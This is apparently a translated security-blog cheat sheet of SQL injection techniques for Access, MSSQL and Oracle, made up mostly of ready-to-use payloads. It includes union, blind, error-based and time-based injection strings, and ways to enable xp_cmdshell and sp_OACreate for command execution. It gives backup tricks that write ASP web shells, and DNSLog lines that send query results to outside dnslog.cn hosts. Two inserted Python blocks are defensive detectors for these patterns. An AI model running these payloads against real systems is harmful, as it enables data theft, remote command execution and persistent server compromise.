Before reading this article, it is recommended that you first read
because many injection techniques carry over.
I. Access injection
Access is a lightweight database: there is only a single database, no user accounts, and all data lives in a single file. When injecting, table names and column names must be guessed.
Access only offers union injection and boolean blind injection.
1. Union injection
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
2. Boolean blind injection
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97
3. How to query the value in the second row
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin
4. Some special approaches to guessing column names in Access
Using HAVING to reveal columns
select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1,id group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1
Offset injection: one column name has to be guessed, usually id
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
Shift-overflow injection
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin
When the two are combined, the total number of columns must be four times the number of admin columns. Above there are 22 columns in total and admin has 6 columns, which does not satisfy the condition. Assuming admin has 4 columns:
select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)
5. Some tips
Access whitespace characters: %20, %09, %0A, %0C, %0D
Comments: there is no official comment syntax, but there are comment characters: %16, %00
Special IIS behaviour
A stray % is allowed, e.g. uni%on select
Unicode encoding is allowed, e.g. %u0075%u006eion select
This resembles the JSON format, {"id":"\u0031"}
Duplicate parameters are joined with a comma: id=1&id=2 becomes id=1,2
So this works: id=1 and/*&id=*/1=1
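The IIS and classic ASP behaviours just listed (a stray %, %uXXXX escapes, comma-joined duplicate parameters, and a comment spliced across two parameters) defeat any detector that only looks at the raw query string. Added here as a defensive example that is not part of the original post: a Python normaliser that applies those rules first and then looks for keywords; the keyword list and the comma-joining rule are assumptions of this example.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Keywords worth flagging once the value has been normalised the way the page
# says IIS/classic ASP sees it (hypothetical minimal list for this example).
SQL_KEYWORDS = ("union", "select", "from", "exists", "having", "and", "or")

def decode_iis(raw: str) -> str:
    """Decode a query-string value as IIS does for classic ASP: %uXXXX escapes,
    then a stray '%' that is not a valid escape is dropped (so 'uni%on' becomes
    'union'), then ordinary %XX escapes."""
    raw = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), raw)
    raw = re.sub(r"%(?![0-9a-fA-F]{2})", "", raw)
    return unquote(raw)

def parse_query(query: str) -> tuple[dict[str, str], set[str]]:
    """Split a raw query string; repeated names are joined with a comma,
    mirroring the page's id=1&id=2 -> id=1,2 (assumed exact join rule).
    Returns the merged values and the set of names that were repeated."""
    params, repeated = {}, set()
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_iis(raw)
        if name in params:
            params[name] += "," + value
            repeated.add(name)
        else:
            params[name] = value
    return params, repeated

def normalize(value: str) -> str:
    """Replace /* */ comments with a space (so 'and/*,*/1=1' reads 'and 1=1'),
    then collapse the separators Access accepts (%09 %0A %0C %0D %20) and the
    bytes it treats as comment characters (%00 %16)."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"[\x00\x09\x0a\x0c\x0d\x16 ]+", " ", value)
    return value.strip().lower()

def analyze(query: str) -> dict[str, list[str]]:
    """Per parameter: matched SQL keywords after normalisation, plus
    'repeated-parameter' when comma-joining could splice a comment."""
    params, repeated = parse_query(query)
    report = {}
    for name, value in params.items():
        text = normalize(value)
        hits = [kw for kw in SQL_KEYWORDS if re.search(rf"\b{kw}\b", text)]
        if name in repeated:
            hits.append("repeated-parameter")
        if hits:
            report[name] = hits
    return report
```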
How to get a shell
Direct export, i.e. getting a shell via backup; requires the IIS6 parsing vulnerability
select * into [a] in 'E:\1.asp;.xls' 'excel 4.0;' from admin
If the database file (.mdb) can be parsed, insert 【┼攠數畣整爠煥敵瑳∨≡┩愾】 into any value; it is interpreted as <%eval request ("a")%>
Column and table names can be wrapped
select(password)from(admin)
select[password]from[admin]
select`password`from`admin`
Injection without SELECT
id = 39 and asc(mid(dfirst("password","admin"),1,1))=97
select dfirst(1,"admin")
select dfirst("password","admin")
select dfirst("[password]","[admin]","id=40")
select dlast("[password]","[admin]")
In addition, dlookup, dmin, dmax and dcount are available
davg, dsum, DStDev, DStDevP, DVar and DVarP only work on numeric types
Other string comparison functions
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a')
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a48e190fafc')
II. MSSQL injection
1. Union injection
http://127.0.0.1/1.aspx?id=1 order by 4
http://127.0.0.1/1.aspx?id=-1 union select 1,2,3,4
http://127.0.0.1/1.aspx?id=-1 union all select null,null,null,null
http://127.0.0.1/1.aspx?id=-1 union all select null,db_name(),null,null
Listing databases; the first six are system databases
(select name from master.dbo.sysdatabases where dbid=7)
Querying the first table in the specified database test
(select top 1 name from test.dbo.sysobjects where xtype='U')
Querying the first table in the current database
(select top 1 name from sysobjects where xtype='U')
Querying the second table in the current database
(select top 1 name from sysobjects where xtype='U' and name not in ('admin'))
Querying all tables in the current database
(select name from sysobjects where xtype='U' FOR XML PATH(''))
Querying columns
(select top 1 name from syscolumns where id=object_id('admin'))
Querying all columns, separated with |
(select '|'%2bname%2b'|' from syscolumns where id=object_id('admin') FOR XML PATH(''))
Enumerating columns quickly by changing the 0
(select top 1 name from syscolumns where id=object_id('admin') and name not in (select top 0 name from syscolumns where id=object_id('admin')))
Querying all values
(select password+username from admin FOR XML PATH(''))
Querying tables and columns the MySQL way
(select top 1 table_name from information_schema.tables)
(select top 1 column_name from information_schema.columns where table_name='admin')
If subqueries cannot be used, you may need to wrap them in the exists() function
2. Error-based injection
MSSQL is very prone to error-based injection: just compare a string with a number
http://127.0.0.1/1.aspx?id=@@version
http://127.0.0.1/1.aspx?id=1 and @@version=1
http://127.0.0.1/1.aspx?id=1 and 1=convert(int,@@version)
http://127.0.0.1/1.aspx?id=1 and 1=cast(@@version as int)
http://127.0.0.1/1.aspx?id=1%2bUSER_NAME(@@version)
Here USER_NAME() can be replaced by SUSER_NAME(), PERMISSIONS(), DB_NAME(), FILE_NAME(), TYPE_NAME() or COL_NAME()
3. Blind injection
Boolean blind injection
http://127.0.0.1/1.aspx?id=1 and ascii(substring((select user),1,1))=100
Time-based blind injection
http://127.0.0.1/1.aspx?id=1;if(ascii(substring((select user),1,1)))=100 WAITFOR DELAY '0:0:5'
select * from admin where id = 1 if 1=2 WAITFOR DELAY '0:0:5'
DNSLog injection: requires sa and stacked queries
The principle is that xp_subdirs, xp_dirtree and xp_fileexist read from an SMB share, so the share's hostname gets resolved. OpenRowset() and OpenDatasource() can also be used; these two functions load remote MSSQL databases and are disabled by default.
declare @host varchar(1024); select @host=convert(varchar(1024),db_name())+'.vj0r9q.dnslog.cn'; exec('master..xp_subdirs "\\'+@host+'"');
or
exec('master..xp_dirtree "\\'+@host+'"');
exec('master..xp_fileexist "\\'+@host+'\test"');
DNSLog without stacked queries
and exists(select * from fn_xe_file_target_read_file('C:\Windows\win.ini','\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_get_audit_file('\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_trace_gettable('\\'+(select user)+'.xrjff0.dnslog.cn\1.trc',null))
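Every DNSLog variant above, stacked or not, routes through a small set of path-taking procedures and a UNC host that is spliced together from query output, which makes the pattern easy to flag in query audit logs or a WAF. Added here as a defensive example that is not part of the original post: a Python check for those sinks, for stacking outside string literals, and for dynamically built UNC hosts; the sink lists and the severity scale are assumptions of this example.

```python
from __future__ import annotations
import re

# Sinks taken from the page: path arguments that make SQL Server resolve a
# UNC host (an out-of-band DNS/SMB channel) and procedures that run commands.
# The lists and the severity scale are assumptions of this example.
UNC_SINKS = ("xp_dirtree", "xp_subdirs", "xp_fileexist",
             "fn_xe_file_target_read_file", "fn_get_audit_file", "fn_trace_gettable")
EXEC_SINKS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_add_jobstep",
              "openrowset", "opendatasource", "sp_makewebtask")
UNC_RE = re.compile(r"\\\\([^\\\s]+)")   # '\\' followed by the first host segment
STR_RE = re.compile(r"'(?:[^']|'')*'")    # T-SQL string literal, '' escapes included

def strip_literals(stmt: str) -> str:
    """Replace string literals so a ';' inside a string is not mistaken for stacking."""
    return STR_RE.sub("'S'", stmt)

def findings(stmt: str) -> list[str]:
    """Label what a statement or parameter value contains, in a fixed order."""
    low, out = stmt.lower(), []
    if ";" in strip_literals(stmt).rstrip().rstrip(";"):
        out.append("stacked-statements")
    out += ["unc-sink:" + n for n in UNC_SINKS if n in low]
    out += ["exec-sink:" + n for n in EXEC_SINKS if n in low]
    hosts = UNC_RE.findall(stmt)
    # A host spliced together with +, || or a variable is built from query
    # output: the DNS lookup itself carries the data out.
    if any(c in h for h in hosts for c in ("+", "||", "@")):
        out.append("dynamic-unc-host")
    elif hosts:
        out.append("static-unc-host")
    return out

def severity(stmt: str) -> str:
    """Map findings to a triage level for an alert pipeline."""
    f = findings(stmt)
    if "dynamic-unc-host" in f or any(x.startswith("exec-sink") for x in f):
        return "critical"
    if "stacked-statements" in f or any(x.startswith("unc-sink") for x in f):
        return "high"
    return "low" if f else "none"
```

A static UNC path to a known file server is legitimate traffic; the signal worth alerting on is the concatenated host, which is present in all three non-stacked payloads above.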
4. Stacked injection
Stacked injection is common in MSSQL and is equivalent to a direct database connection: you can insert, delete, update and query directly. With sa privileges, extended procedures can be used for further exploitation.
Under stacked injection, declare and exec allow injection without SELECT
declare @s varchar(2000) set @s=0x73656C6563742031 exec(@s)
5. Extended procedures under stacked injection
xp_cmdshell: command execution; disabled by default on newer versions, but can be enabled
Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; Exec master.dbo.xp_cmdshell 'whoami';
Two ways to run xp_cmdshell without stacked queries
id=1 if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell''whoami''');
openrowset has been disabled by default since 2005; it must be enabled before it can run xp_cmdshell without stacking, and it can also be used to read files.
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''calc''')
select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)
sp_OACreate and sp_OAMethod can be used for command execution and file operations, without output
EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >D:\\1.txt'
DECLARE @Result int;DECLARE @FSO_Token int;EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT;EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'D:\1.txt';EXEC @Result = sp_OADestroy @FSO_Token;
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:\1.txt', 'D:\2.txt';
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out;exec sp_oamethod @o, 'copyfile',null,'D:\1.txt' ,'D:\2.txt';
declare @o int;exec sp_oacreate 'Shell.Application', @o out;exec sp_oamethod @o, 'ShellExecute',null,'C:\windows\system32\calc.exe';
Executing commands via an Agent job
USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt', @retry_attempts = 1, @retry_interval = 5 ; EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';
CLR assemblies
Sandbox command execution (older versions only)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
sp_makewebtask (older versions only)
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; exec sp_makewebtask 'D:\1.asp','select''<%execute(request("a"))%>'' ';
xp_dirtree and xp_subdirs list files; xp_fileexist checks whether a file exists
execute master..xp_dirtree 'c:',1,1
execute master..xp_subdirs 'c:'
execute master..xp_fileexist 'D:\test.txt'
xp_regenumvalues, xp_regread, xp_regwrite, xp_regdeletevalue, xp_regdeletekey: registry operations.
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
EXEC master..xp_regenumvalues 'HKEY_CURRENT_USER','Control Panel\International','sCountry';
sp_helpextendedproc: list all extended procedures
EXEC master..sp_helpextendedproc
xp_availablemedia: list drives
exec master..xp_availablemedia
xp_logininfo, xp_enumgroups: list the computer's users and groups
exec xp_logininfo
sp_who2: list logged-in accounts
EXEC master..sp_who2
sp_addlinkedserver and sp_addlinkedsrvlogin
Can log in to other MSSQL or Oracle servers
6. File reading and writing
File reading with BULK INSERT
create table #testtable(context ntext); BULK INSERT #testtable FROM 'D:/test.txt' WITH (DATAFILETYPE = 'char',KEEPNULLS); select * from #testtable;drop table #testtable;
Database backup
create table [bin_cmd]([cmd] [image]); declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s; insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>'); declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='E:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT; drop table [bin_cmd];
Log backup
create table [bin_cmd]([cmd] [image]); declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s; insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>'); declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate; drop table [bin_cmd];
7. Some tips
Built-in MSSQL functions
@@version system_user suser_sname() user db_name() host_name()
MSSQL whitespace characters
%01 through %20 are all whitespace; -- and /**/ are comments, and %00 can also serve as a comment character
Obfuscating keywords
id=0xunion select\Nnull,null,null,null from.admin
Avoiding quotes
(select top 1 name from syscolumns where id=object_id('admin'))
(select top 1 name from syscolumns where id=object_id(char(97)+char(100)+char(109)+char(105)+char(110)))
Dumping the full current statement
id=1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null
III. Oracle injection
1. Union injection
null must be used, and an Oracle select must include the dummy table: from dual
http://luoke.cn:81/oracle.php?id=1 order by 3
http://luoke.cn:81/oracle.php?id=-1 union select null,(select user from dual),null from dual
Current database name
select name from v$database
IP address, IPv6
select utl_inaddr.get_host_address from dual
User privileges
select privilege from session_privs where rownum=1
Querying databases
select owner from all_tables where rownum=1
Querying other databases
select owner from all_tables where rownum=1 and owner <>'SYS'
Querying the first table
select table_name from user_tables where rownum=1
Quickly querying the second table
select table_name from (select rownum r, table_name from user_tables order by table_name) WHERE r=2
Querying the first column
select column_name from user_tab_columns where rownum=1 and table_name='admin'
Querying the first value
select concat(username,password) from admin where rownum=1
select username||password from admin where rownum=1
2. Error-based injection
Oracle error-based injection is also simple: compare a string with a number, or use is not null
and 1=utl_inaddr.get_host_name((select user from dual))
and 1=ctxsys.drithsx.sn(1,(select user from dual))
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
3. Blind injection
Boolean blind injection; decode behaves like if
and 6=length(user)
and 83=(select ascii(substr((select user from dual),1,1)) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),1,0) from dual)
Time-based blind injection
and 1=(select decode(substr((select user from dual),1,1),chr(83),DBMS_PIPE.RECEIVE_MESSAGE(CHR(78),2),0) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),(select count(*) from all_objects),0) from dual)
(select count(*) from all_objects) is an expensive operation, similar to a MySQL Cartesian product; if the delay is not noticeable, (select count(*) from all_objects)||(select count(*) from all_objects) doubles the time
DNSLog blind injection
and utl_http.request('http://'||(select user from dual)||'.0n7kdm.dnslog.cn/')=1
and UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.7vkm67.dnslog.cn')=1
4. Oracle tips
Oracle whitespace characters: %00 %0A %0D %0C %09 %20
Comments: /**/ and -- are supported as well
Avoiding quotes
and user='SYSTEM'
and user=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)
Source: freebuf.com 2021-01-22 09:21:30 by: sonomon